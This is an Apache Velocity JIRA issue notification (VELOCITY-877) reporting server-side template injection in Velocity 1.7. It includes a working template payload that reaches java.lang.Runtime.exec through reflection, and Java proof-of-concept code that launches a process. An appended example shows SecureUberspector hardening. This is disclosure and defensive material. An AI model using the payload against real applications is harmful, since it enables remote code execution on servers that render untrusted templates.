[ https://issues.apache.org/jira/browse/VELOCITY-877?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Markus Wulftange updated VELOCITY-877:
--------------------------------------
    Description: 
It is possible to reference certain fields/methods, which eventually allow the 
execution of arbitrary methods.

For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of 
any variable, it is possible to get the variable's class object. This can be 
extended to get arbitrary class objects and execute arbitrary methods.

For example, the following statement results in the execution of the 
'{{xterm}}':
{code}
$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
{code}

As a standalone:

{code:java}
import java.io.StringWriter;

import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.Velocity;
import org.apache.velocity.context.Context;

public class VelocityTest {

    // Velocity.evaluate() declares checked exceptions (IOException, ParseErrorException, ...)
    public static void main(String[] args) throws Exception {
        // Any ordinary object in the context is enough: the payload only needs
        // getClass() on it to reach java.lang.Class and then Class.forName().
        Context context = new VelocityContext();
        context.put("var", "foo");
        String instring =
            "$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()";
        // The rendered output (the exit code returned by waitFor()) goes to this
        // Writer; the process has already been started by the time it is written.
        StringWriter out = new StringWriter();
        Velocity.evaluate(context, out, "templateName", instring);
    }

}
{code}

This issue has already been made public in the past by James Kettle in August 
2015 (see 
http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity)
 and via CVE-2015-5603 (see 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly 
others.

  was:
It is possible to reference certain fields/methods, which eventually allow the 
execution of arbitrary methods.

For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of 
any variable, it is possible to get the variable's class object. This can be 
extended to get arbitrary class objects and execute arbitrary methods.

For example, the following statement results in the execution of the 
'{{xterm}}':
{code}
$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
{code}

As a standalone:

{code:java}
import java.io.StringWriter;

import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.Velocity;
import org.apache.velocity.context.Context;

public class VelocityTest {

    // Velocity.evaluate() declares checked exceptions (IOException, ParseErrorException, ...)
    public static void main(String[] args) throws Exception {
        Context context = new VelocityContext();
        context.put("var", "foo");
        // Class objects are obtained through $var.class.class.forName(...);
        // $String and $Character are set but not used by this payload.
        String instring =
            "#set($String=$var.class.class.forName('java.lang.String'))"
            + "#set($Character=$var.class.class.forName('java.lang.Character'))"
            + "#set($Runtime=$var.class.class.forName('java.lang.Runtime'))"
            + "#set($proc=$Runtime.getRuntime().exec('xterm'))$proc.waitFor()";
        // Rendered output (the exit code from waitFor()) goes to this Writer.
        StringWriter out = new StringWriter();
        Velocity.evaluate(context, out, "templateName", instring);
    }

}
{code}

This issue has already been made public in the past by James Kettle in August 
2015 (see 
http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity)
 and via CVE-2015-5603 (see 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly 
others.


> Access to critical fields/methods allows execution of arbitrary code 
> ('Template Injection')
> -------------------------------------------------------------------------------------------
>
>                 Key: VELOCITY-877
>                 URL: https://issues.apache.org/jira/browse/VELOCITY-877
>             Project: Velocity
>          Issue Type: Bug
>          Components: Engine
>    Affects Versions: 1.7
>            Reporter: Markus Wulftange
>            Priority: Critical
>              Labels: security



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@velocity.apache.org
For additional commands, e-mail: dev-h...@velocity.apache.org
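Added example (not part of the issue report and not Velocity project code): the same attacker-controlled reference chain rendered by a default VelocityEngine and by one configured with the SecureUberspector that ships with Velocity, so the difference is visible side by side. It assumes Velocity 1.7 on the classpath; the class, method and constant names (SecureUberspectDemo, defaultEngine, hardenedEngine, render, PROBE) are my own. The probe follows the report's reflection path to java.lang.Runtime but only asks for the CPU count instead of spawning a process.

```java
import java.io.StringWriter;

import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.runtime.RuntimeConstants;

/**
 * Added example, not from the issue: contrasts default introspection with
 * SecureUberspector on the reflection chain used by the report.
 * Assumes Velocity 1.7.
 */
public class SecureUberspectDemo {

    /** Harmless probe along the report's path: getClass() -> Class.forName() -> Runtime,
     *  but it only reads availableProcessors() instead of calling exec(). */
    static final String PROBE =
        "$var.class.forName('java.lang.Runtime').getRuntime().availableProcessors()";

    /** Stock configuration: UberspectImpl resolves any public method by reflection. */
    static VelocityEngine defaultEngine() throws Exception {
        VelocityEngine ve = new VelocityEngine();
        ve.init();
        return ve;
    }

    /** Hardened configuration: runtime.introspector.uberspect points at the
     *  SecureUberspector, whose introspector refuses method lookups on the
     *  classes listed in introspector.restrict.classes (java.lang.Class,
     *  Runtime, Thread, ClassLoader, ...) and on java.lang.reflect. */
    static VelocityEngine hardenedEngine() throws Exception {
        VelocityEngine ve = new VelocityEngine();
        ve.setProperty(RuntimeConstants.UBERSPECT_CLASSNAME,
                "org.apache.velocity.util.introspection.SecureUberspector");
        ve.init();
        return ve;
    }

    /** Renders an untrusted template string against a context holding one plain String. */
    static String render(VelocityEngine ve, String template) throws Exception {
        VelocityContext ctx = new VelocityContext();
        ctx.put("var", "foo");
        StringWriter out = new StringWriter();
        ve.evaluate(ctx, out, "untrusted", template);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // Default: $var.class is String.class, forName() on it is a public static
        // method of java.lang.Class, getRuntime() is found as a static method of
        // Runtime, so a number such as "8" is rendered.
        System.out.println("default : " + render(defaultEngine(), PROBE));
        // Hardened: getClass() on the String is still allowed, but forName() is
        // looked up on java.lang.Class, which is restricted; the lookup returns
        // null, SecureIntrospectorImpl logs a warning, and the unresolved
        // reference is echoed back literally instead of being executed.
        System.out.println("hardened: " + render(hardenedEngine(), PROBE));
    }
}
```

SecureUberspector is a mitigation rather than a fix: it blocks the reflection route through java.lang.Class, and the restricted lists can be extended with the introspector.restrict.classes and introspector.restrict.packages properties, but any object placed into the context that itself exposes a dangerous operation remains callable from the template. The robust control is to keep untrusted input out of the template source altogether and only pass it in as context values.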
